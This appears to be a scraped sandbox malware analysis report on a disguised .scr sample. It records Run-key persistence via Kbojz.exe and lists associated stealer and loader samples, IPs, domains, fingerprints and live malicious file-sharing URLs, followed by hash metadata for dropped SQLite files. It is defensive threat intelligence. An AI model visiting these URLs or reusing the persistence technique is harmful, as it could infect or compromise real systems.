Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr

Simulations

Behavior and APIs

Time	Type	Description
07:16:53	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Kbojz C:\Users\user\AppData\Roaming\Kbojz.exe
07:17:02	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Kbojz C:\Users\user\AppData\Roaming\Kbojz.exe
16:16:40	API Interceptor	354x Sleep call for process: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr modified
16:17:02	API Interceptor	586x Sleep call for process: Kbojz.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
150.171.41.11	20240416-703661.cmd	Get hash	malicious	DBatLoader	Browse
	20240416-703661.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, RedLine	Browse
	ONISZCZUK ASSOCIATES Purchase Order.bat	Get hash	malicious	Remcos, DBatLoader	Browse
	82__GT7568.PDF.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, RedLine	Browse
	ref_00845-25-03-24.bat	Get hash	malicious	DBatLoader	Browse
	RFQ#30091.CMD.cmd	Get hash	malicious	DBatLoader	Browse
	Ordine_51000042184300000455100.cmd	Get hash	malicious	DBatLoader	Browse
	PO_No_0013011100.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	https://1drv.ms/b/s!Au_iWJNj9ucega8VdNm54Y_182oELA	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win32.SpywareX-gen.21740.30024.exe	Get hash	malicious	Remcos, DBatLoader	Browse
13.107.137.11	Payment Remittance Advice_000000202213.xlsb	Get hash	malicious	Unknown	Browse	onedrive.live.com/download?cid=64F8294A00286885&resid=64F8294A00286885%21770&authkey=ABI3zrc6BsVUKxU

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
dual-spov-0006.spov-dc-msedge.net	20240416-703661.cmd	Get hash	malicious	DBatLoader	Browse	150.171.43.11
	20240416-703661.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, RedLine	Browse	150.171.41.11
	DHL Shipping Documents_pdf.vbs	Get hash	malicious	AgentTesla	Browse	150.171.43.11
	ONISZCZUK ASSOCIATES Purchase Order.bat	Get hash	malicious	Remcos, DBatLoader	Browse	150.171.41.11
	82__GT7568.PDF.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, RedLine	Browse	150.171.41.11
	CONFIRMATION ORDER1.bat	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, RedLine	Browse	150.171.43.11
	ref_00845-25-03-24.bat	Get hash	malicious	DBatLoader	Browse	150.171.41.11
	RFQ#30091.CMD.cmd	Get hash	malicious	DBatLoader	Browse	150.171.43.11
	lewxa.exe	Get hash	malicious	DBatLoader	Browse	150.171.43.11
	Ordine_51000042184300000455100.cmd	Get hash	malicious	DBatLoader	Browse	150.171.41.11
dual-spov-0006.spov-msedge.net	SecuriteInfo.com.Trojan.Siggen28.27399.23329.29047.exe	Get hash	malicious	Remcos, DBatLoader	Browse	13.107.137.11
	XY2I8rWLkM.exe	Get hash	malicious	Remcos, DBatLoader	Browse	13.107.139.11
	2020.xls	Get hash	malicious	Remcos, DBatLoader	Browse	13.107.137.11
	Signed Proforma Invoice 3645479_pdf.vbs	Get hash	malicious	FormBook	Browse	13.107.139.11
	ORDER-CONFIRMATION-DETAILS-000235374564.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, RedLine	Browse	13.107.139.11
	RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZ	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, RedLine	Browse	13.107.137.11
	20240416-703661.cmd	Get hash	malicious	DBatLoader	Browse	13.107.139.11
	20240416-703661.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, RedLine	Browse	13.107.139.11
	disktop.pif.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer, RedLine	Browse	13.107.139.11
	https://1drv.ms/o/s!AhT23e1MofOfpnjbpE9m51fOcII5?e=K3DPPG	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	13.107.137.11

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MICROSOFT-CORP-MSN-AS-BLOCKUS	ul5RjxwWTK.elf	Get hash	malicious	Unknown	Browse	20.1.13.62
	order.exe	Get hash	malicious	Unknown	Browse	52.109.6.53
	https://diversityjobs.com/employer/company/1665/Worthington-Industries-Inc	Get hash	malicious	Unknown	Browse	52.162.201.54
	mCS7AR9pKm.elf	Get hash	malicious	Mirai, Okiru	Browse	20.174.35.247
	SecuriteInfo.com.Trojan.Siggen28.27399.23329.29047.exe	Get hash	malicious	Remcos, DBatLoader	Browse	13.107.137.11
	Gantt_Excel_Pro_Daily_Free1.xlsm	Get hash	malicious	Unknown	Browse	13.107.246.40
	https://jll2.sharepoint.com/:f:/t/WorkplaceStrategy274/EqyxzpLxD8lEhSn1hXMNtKMBbmoik8-xeuIbHrYk7cgngA?e=5%3a2wyFQq&at=9&xsdata=MDV8MDJ8cGF0cmljaWEucmliZWlyb0Bub3ZvYmFuY28ucHR8NjlmMTdkMWU5YzBjNDFkN2UwZmIwOGRjNTNjN2YwZTV8MTAzMzgwNDgxOTNhNDI5OGFiZWEzNTk2YWU4OGIwNWV8MHwwfDYzODQ3NzM2NTQwMjI0OTQwNXxVbmtub3dufFRXRnBiR1pzYjNkOGV5SldJam9pTUM0d0xqQXdNREFpTENKUUlqb2lWMmx1TXpJaUxDSkJUaUk2SWsxaGFXd2lMQ0pYVkNJNk1uMD18MHx8fA%3d%3d&sdata=T2RkZHdHdHpwUXkxSG5Kd2Noc1RHVUc3YVNLVE1sOWZUTXdVZitYYXh6Yz0%3d	Get hash	malicious	HTMLPhisher	Browse	13.107.136.10
	http://monacolife.net	Get hash	malicious	Unknown	Browse	13.107.246.41
	https://www.joesandbox.com/login	Get hash	malicious	Unknown	Browse	13.107.246.41
MICROSOFT-CORP-MSN-AS-BLOCKUS	ul5RjxwWTK.elf	Get hash	malicious	Unknown	Browse	20.1.13.62
	order.exe	Get hash	malicious	Unknown	Browse	52.109.6.53
	https://diversityjobs.com/employer/company/1665/Worthington-Industries-Inc	Get hash	malicious	Unknown	Browse	52.162.201.54
	mCS7AR9pKm.elf	Get hash	malicious	Mirai, Okiru	Browse	20.174.35.247
	SecuriteInfo.com.Trojan.Siggen28.27399.23329.29047.exe	Get hash	malicious	Remcos, DBatLoader	Browse	13.107.137.11
	Gantt_Excel_Pro_Daily_Free1.xlsm	Get hash	malicious	Unknown	Browse	13.107.246.40
	https://jll2.sharepoint.com/:f:/t/WorkplaceStrategy274/EqyxzpLxD8lEhSn1hXMNtKMBbmoik8-xeuIbHrYk7cgngA?e=5%3a2wyFQq&at=9&xsdata=MDV8MDJ8cGF0cmljaWEucmliZWlyb0Bub3ZvYmFuY28ucHR8NjlmMTdkMWU5YzBjNDFkN2UwZmIwOGRjNTNjN2YwZTV8MTAzMzgwNDgxOTNhNDI5OGFiZWEzNTk2YWU4OGIwNWV8MHwwfDYzODQ3NzM2NTQwMjI0OTQwNXxVbmtub3dufFRXRnBiR1pzYjNkOGV5SldJam9pTUM0d0xqQXdNREFpTENKUUlqb2lWMmx1TXpJaUxDSkJUaUk2SWsxaGFXd2lMQ0pYVkNJNk1uMD18MHx8fA%3d%3d&sdata=T2RkZHdHdHpwUXkxSG5Kd2Noc1RHVUc3YVNLVE1sOWZUTXdVZitYYXh6Yz0%3d	Get hash	malicious	HTMLPhisher	Browse	13.107.136.10
	http://monacolife.net	Get hash	malicious	Unknown	Browse	13.107.246.41
	https://www.joesandbox.com/login	Get hash	malicious	Unknown	Browse	13.107.246.41
CHELYABINSK-SIGNAL-ASRU	#U7535#U5b50#U53d1#U79682039920102-2022.jpg.htm	Get hash	malicious	Unknown	Browse	80.85.156.131
	https://pub-c703dadea8164d9790f4641e531245a0.r2.dev/killarhDOC.html	Get hash	malicious	HTMLPhisher	Browse	80.85.152.20
	file.exe	Get hash	malicious	RedLine	Browse	80.85.152.116
	file.exe	Get hash	malicious	Babuk, Djvu, Glupteba, RedLine, SmokeLoader, Vidar, Xmrig	Browse	80.85.156.25
	pYJ4V8A183.exe	Get hash	malicious	AgentTesla	Browse	185.144.31.89
	0017062].exe	Get hash	malicious	AveMaria, DBatLoader, UACMe	Browse	80.85.153.111
	wLZpYyx233.exe	Get hash	malicious	RedLine	Browse	80.85.152.191
	LD1VgkLeoa.exe	Get hash	malicious	AsyncRAT	Browse	80.85.153.152
	DOCUMENTS.bat	Get hash	malicious	RedLine	Browse	80.85.157.78
	oypmPkcmDj.exe	Get hash	malicious	RedLine	Browse	80.85.157.78

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
7dcce5b76c8b17472d024758970a406b	Invoice No. 03182024.docx	Get hash	malicious	Remcos	Browse	13.107.137.11
	2020.xls	Get hash	malicious	Remcos, DBatLoader	Browse	13.107.137.11
	CTM REQUEST BIRTHSHIP.doc	Get hash	malicious	AgentTesla	Browse	13.107.137.11
	SecuriteInfo.com.Exploit.ShellCode.69.31966.31539.rtf	Get hash	malicious	Remcos	Browse	13.107.137.11
	TransactionSummary_910020049836765_110424045239.xlsx	Get hash	malicious	AgentTesla	Browse	13.107.137.11
	rks18.doc	Get hash	malicious	AgentTesla	Browse	13.107.137.11
	5FU4LRpQdy.rtf	Get hash	malicious	Remcos	Browse	13.107.137.11
	NEW ORDER.doc	Get hash	malicious	HTMLPhisher	Browse	13.107.137.11
	yDOZ8nTvm8.rtf	Get hash	malicious	AgentTesla	Browse	13.107.137.11
	DETAILS.docx.doc	Get hash	malicious	Remcos	Browse	13.107.137.11
36f7277af969a6947a61ae0b815907a1	TransactionSummary_910020049836765_110424045239.xlsx	Get hash	malicious	AgentTesla	Browse	150.171.41.11 13.107.137.11
	msXkgFIUyS.rtf	Get hash	malicious	AgentTesla	Browse	150.171.41.11 13.107.137.11
	BANK LETTER.doc	Get hash	malicious	AgentTesla	Browse	150.171.41.11 13.107.137.11
	NEW GRACE- RFQ .doc	Get hash	malicious	AgentTesla, GuLoader	Browse	150.171.41.11 13.107.137.11
	78YW3Fcvv0.rtf	Get hash	malicious	AgentTesla	Browse	150.171.41.11 13.107.137.11
	Booking copy.xls	Get hash	malicious	AgentTesla	Browse	150.171.41.11 13.107.137.11
	Dados Da Reserva.ppam	Get hash	malicious	Unknown	Browse	150.171.41.11 13.107.137.11
	Request_For_ Quotation.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	150.171.41.11 13.107.137.11
	RFQ.doc	Get hash	malicious	AgentTesla	Browse	150.171.41.11 13.107.137.11
	302814Q.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	150.171.41.11 13.107.137.11

Process:	C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
File Type:	SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	77824
Entropy (8bit):	1.133993246026424
Encrypted:	false
SSDEEP:	96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
MD5:	8BB4851AE9495C7F93B4D8A6566E64DB
SHA1:	B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
SHA-256:	143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
SHA-512:	DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Cocwtjozfrv.tmpdb

Download File

Process:	C:\Users\user\AppData\Roaming\Kbojz.exe
File Type:	SQLite 3.x database, last written using SQLite version 3008001, file counter 24, database pages 5, cookie 0xf, schema 4, UTF-8, version-valid-for 24
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.3870145383915669
Encrypted:	false
SSDEEP:	48:TBLOpEO5J/Kd7UEvqckQaKgj5EZwx1wayEgd7kKK9LeYyBlIAO/tXK:hNw0CKaKfu1wai6LeYzN/9K
MD5:	1623709C6B2FB813984B1265C26A85F1
SHA1:	CCE4DDBE93E97E68359CB6FD71242F796A785F86
SHA-256:	88BCF762A75F085ECD3B12EB2BA81B81A7F8C9CDDDD4DED624BA28566EB7EEAA
SHA-512:	6D2E23E4E0D1D912AF3426129F7DE490F23326F6179EEC27AFE28C438CA37493AEA775E62755C76D6A8850DB6D6E70F0D0A8D396A35E869F4BF0F761CDD507D8
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .........................................................................-........#..k...#.<....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Eiakizpyayx.tmpdb

Download File

Process:	C:\Users\user\AppData\Roaming\Kbojz.exe
File Type:	SQLite 3.x database, user version 35, last written using SQLite version 3008001, page size 32768, writer version 2, read version 2, file counter 3, database pages 35, cookie 0x1d, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	1146880
Entropy (8bit):	0.15644146423012004
Encrypted:	false
SSDEEP:	192:CdEcZ6zssdySB+exixS4fS4QS4NS4ibRqwxeKlZfTOmPp80WOpp:+EccZdD3yJnbkw0KlAo5H
MD5:	E28514A583D6F83F8C67CA62CB891CA7
SHA1:	4107934697F0891B26B16A6E0D9795271353355C
SHA-256:	B41E251C18B2B1CDD79E33F0B3AB12EAD8EF257969E26BFBB06DB7C70E9E0FFC
SHA-512:	BF83CD24FEA896D38F07EA61FA639FCE7CC637AB97C6DFE5A6502772DECC4835160F5F49442266024B6564947B0AFB72901A8B1C848AF00808F0A3E08B740E4E
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......#...............................#.................................-...}.."l..~\}.\|.}M{.\|az.y.zdyqx.y8w.xJviu.t.tNs.sxs.r.r.q.p.pwp.o.n.nym.mRl.l.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Eyyfpwdpwe.tmpdb

Download File

Process:	C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
File Type:	SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.7798653713156546
Encrypted:	false
SSDEEP:	48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
MD5:	CD5ACB5FAA79EEB4CDB481C6939EEC15
SHA1:	527F3091889C553B87B6BC0180E903E2931CCCFE
SHA-256:	D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
SHA-512:	A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Jalcxg.tmpdb

Download File

Process:	C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
File Type:	SQLite 3.x database, last written using SQLite version 3008001, file counter 24, database pages 5, cookie 0xf, schema 4, UTF-8, version-valid-for 24
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.3870145383915669
Encrypted:	false
SSDEEP:	48:TBLOpEO5J/Kd7UEvqckQaKgj5EZwx1wayEgd7kKK9LeYyBlIAO/tXK:hNw0CKaKfu1wai6LeYzN/9K
MD5:	1623709C6B2FB813984B1265C26A85F1
SHA1:	CCE4DDBE93E97E68359CB6FD71242F796A785F86
SHA-256:	88BCF762A75F085ECD3B12EB2BA81B81A7F8C9CDDDD4DED624BA28566EB7EEAA
SHA-512:	6D2E23E4E0D1D912AF3426129F7DE490F23326F6179EEC27AFE28C438CA37493AEA775E62755C76D6A8850DB6D6E70F0D0A8D396A35E869F4BF0F761CDD507D8
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .........................................................................-........#..k...#.<....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Kcidab.tmpdb

Download File

Process:	C:\Users\user\AppData\Roaming\Kbojz.exe
File Type:	SQLite 3.x database, last written using SQLite version 3008001, file counter 13, database pages 30, 1st free page 27, free pages 1, cookie 0x1e, schema 4, UTF-8, version-valid-for 13
Category:	dropped
Size (bytes):	122880
Entropy (8bit):	1.4530338001328815
Encrypted:	false
SSDEEP:	3072:oNghQnzpCp7pfYcVlVRVHLNYhtn8pApNVuVvY:oNghQnzpCp7pfYcVlVRVHLNYhtn8pApr
MD5:	9DEFC75D6086CCDBE05ED9EE2159CF84
SHA1:	BCF6B1893581F2420564160F784E47E91946269A
SHA-256:	04F89C6DE1CA272A5019395A923DEAE68D5F47641AD5623606E3D092BAA7245A
SHA-512:	D92A772BF416D7BCF0FF3F940E3ECDC4B2130060E85C1EBBBFDD108F535B28F034E1FAD846812607548B02D7AD4DC2BCD11546822E38A6F60ED2D87EB7F5D686
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................-......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Mwcft.tmpdb

Download File

Process:	C:\Users\user\AppData\Roaming\Kbojz.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.7798653713156546
Encrypted:	false
SSDEEP:	48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
MD5:	CD5ACB5FAA79EEB4CDB481C6939EEC15
SHA1:	527F3091889C553B87B6BC0180E903E2931CCCFE
SHA-256:	D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
SHA-512:	A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Nqzztyyufmf.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\Kbojz.exe
File Type:	SQLite 3.x database, last written using SQLite version 3008001, file counter 24, database pages 5, cookie 0xf, schema 4, UTF-8, version-valid-for 24
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.3870145383915669
Encrypted:	false
SSDEEP:	48:TBLOpEO5J/Kd7UEvqckQaKgj5EZwx1wayEgd7kKK9LeYyBlIAO/tXK:hNw0CKaKfu1wai6LeYzN/9K
MD5:	1623709C6B2FB813984B1265C26A85F1
SHA1:	CCE4DDBE93E97E68359CB6FD71242F796A785F86
SHA-256:	88BCF762A75F085ECD3B12EB2BA81B81A7F8C9CDDDD4DED624BA28566EB7EEAA
SHA-512:	6D2E23E4E0D1D912AF3426129F7DE490F23326F6179EEC27AFE28C438CA37493AEA775E62755C76D6A8850DB6D6E70F0D0A8D396A35E869F4BF0F761CDD507D8
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................-........#..k...#.<....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Ntxfuk.tmpdb

Download File

Process:	C:\Users\user\AppData\Roaming\Kbojz.exe
File Type:	SQLite 3.x database, last written using SQLite version 3008001, file counter 13, database pages 30, 1st free page 27, free pages 1, cookie 0x1e, schema 4, UTF-8, version-valid-for 13
Category:	dropped
Size (bytes):	122880
Entropy (8bit):	1.4530338001328815
Encrypted:	false
SSDEEP:	3072:oNghQnzpCp7pfYcVlVRVHLNYhtn8pApNVuVvY:oNghQnzpCp7pfYcVlVRVHLNYhtn8pApr
MD5:	9DEFC75D6086CCDBE05ED9EE2159CF84
SHA1:	BCF6B1893581F2420564160F784E47E91946269A
SHA-256:	04F89C6DE1CA272A5019395A923DEAE68D5F47641AD5623606E3D092BAA7245A
SHA-512:	D92A772BF416D7BCF0FF3F940E3ECDC4B2130060E85C1EBBBFDD108F535B28F034E1FAD846812607548B02D7AD4DC2BCD11546822E38A6F60ED2D87EB7F5D686
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................-......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Oazzuwge.tmpdb

Download File

Process:	C:\Users\user\AppData\Roaming\Kbojz.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	77824
Entropy (8bit):	1.133993246026424
Encrypted:	false
SSDEEP:	96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
MD5:	8BB4851AE9495C7F93B4D8A6566E64DB
SHA1:	B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
SHA-256:	143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
SHA-512:	DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
Malicious:	false
Preview:	SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Opnjh.tmpdb

Download File

Process:	C:\Users\user\AppData\Roaming\Kbojz.exe
File Type:	SQLite 3.x database, user version 7, last written using SQLite version 3008001, page size 32768, writer version 2, read version 2, file counter 5, database pages 4, cookie 0x3, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.07093764277882578
Encrypted:	false
SSDEEP:	12:DgIfgbz+Kh0sFcw23FmdAc/OPVJXfPNn43etRRIYRJxeYaNcDakMGz:DCf1ysFZ232ANVpP9TJKN0MG
MD5:	37F03D0EB1744FFEBCF26E3DB4A4280F
SHA1:	0B120B18B36AD6A64C27D3845A5871D10568C92E
SHA-256:	4D7F53C9B0D3757074542B9EB246FA5242456418394DAD90D23CB0CE8D664040
SHA-512:	49397393F2E9B43A696606EACCAB285165AD7919C1C0D1BC62B42B6C2DD564AA352E49D1172CCEAEF41F6D1D7856523F96D009CE9EA0968017FAE662167CA5A0
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................-.......}..~!..}.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Owotczgukzq.tmpdb

Download File

Process:	C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
File Type:	SQLite 3.x database, last written using SQLite version 3008001, file counter 13, database pages 30, 1st free page 27, free pages 1, cookie 0x1e, schema 4, UTF-8, version-valid-for 13
Category:	dropped
Size (bytes):	122880
Entropy (8bit):	1.4530338001328815
Encrypted:	false
SSDEEP:	3072:oNghQnzpCp7pfYcVlVRVHLNYhtn8pApNVuVvY:oNghQnzpCp7pfYcVlVRVHLNYhtn8pApr
MD5:	9DEFC75D6086CCDBE05ED9EE2159CF84
SHA1:	BCF6B1893581F2420564160F784E47E91946269A
SHA-256:	04F89C6DE1CA272A5019395A923DEAE68D5F47641AD5623606E3D092BAA7245A
SHA-512:	D92A772BF416D7BCF0FF3F940E3ECDC4B2130060E85C1EBBBFDD108F535B28F034E1FAD846812607548B02D7AD4DC2BCD11546822E38A6F60ED2D87EB7F5D686
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................-......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Pxmvdvdnhp.tmpdb

Download File

Process:	C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
File Type:	SQLite 3.x database, user version 7, last written using SQLite version 3008001, page size 32768, writer version 2, read version 2, file counter 5, database pages 4, cookie 0x3, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.07093764277882578
Encrypted:	false
SSDEEP:	12:DgIfgbz+Kh0sFcw23FmdAc/OPVJXfPNn43etRRIYRJxeYaNcDakMGz:DCf1ysFZ232ANVpP9TJKN0MG
MD5:	37F03D0EB1744FFEBCF26E3DB4A4280F
SHA1:	0B120B18B36AD6A64C27D3845A5871D10568C92E
SHA-256:	4D7F53C9B0D3757074542B9EB246FA5242456418394DAD90D23CB0CE8D664040
SHA-512:	49397393F2E9B43A696606EACCAB285165AD7919C1C0D1BC62B42B6C2DD564AA352E49D1172CCEAEF41F6D1D7856523F96D009CE9EA0968017FAE662167CA5A0
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................-.......}..~!..}.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Rdlgtuxmdrq.tmpdb

Download File

Process:	C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
File Type:	SQLite 3.x database, last written using SQLite version 3008001, file counter 13, database pages 30, 1st free page 27, free pages 1, cookie 0x1e, schema 4, UTF-8, version-valid-for 13
Category:	dropped
Size (bytes):	122880
Entropy (8bit):	1.4530338001328815
Encrypted:	false
SSDEEP:	3072:oNghQnzpCp7pfYcVlVRVHLNYhtn8pApNVuVvY:oNghQnzpCp7pfYcVlVRVHLNYhtn8pApr
MD5:	9DEFC75D6086CCDBE05ED9EE2159CF84
SHA1:	BCF6B1893581F2420564160F784E47E91946269A
SHA-256:	04F89C6DE1CA272A5019395A923DEAE68D5F47641AD5623606E3D092BAA7245A
SHA-512:	D92A772BF416D7BCF0FF3F940E3ECDC4B2130060E85C1EBBBFDD108F535B28F034E1FAD846812607548B02D7AD4DC2BCD11546822E38A6F60ED2D87EB7F5D686
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................-......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Rgcgvjqbqci.tmpdb

Download File

Process:	C:\Users\user\AppData\Roaming\Kbojz.exe
File Type:	SQLite 3.x database, last written using SQLite version 3008001, file counter 13, database pages 30, 1st free page 27, free pages 1, cookie 0x1e, schema 4, UTF-8, version-valid-for 13
Category:	dropped
Size (bytes):	122880
Entropy (8bit):	1.4530338001328815
Encrypted:	false
SSDEEP:	3072:oNghQnzpCp7pfYcVlVRVHLNYhtn8pApNVuVvY:oNghQnzpCp7pfYcVlVRVHLNYhtn8pApr
MD5:	9DEFC75D6086CCDBE05ED9EE2159CF84
SHA1:	BCF6B1893581F2420564160F784E47E91946269A
SHA-256:	04F89C6DE1CA272A5019395A923DEAE68D5F47641AD5623606E3D092BAA7245A
SHA-512:	D92A772BF416D7BCF0FF3F940E3ECDC4B2130060E85C1EBBBFDD108F535B28F034E1FAD846812607548B02D7AD4DC2BCD11546822E38A6F60ED2D87EB7F5D686
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................-......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Stygcpda.tmpdb

Download File

Process:	C:\Users\user\AppData\Roaming\Kbojz.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	77824
Entropy (8bit):	1.133993246026424
Encrypted:	false
SSDEEP:	96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
MD5:	8BB4851AE9495C7F93B4D8A6566E64DB
SHA1:	B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
SHA-256:	143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
SHA-512:	DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
Malicious:	false
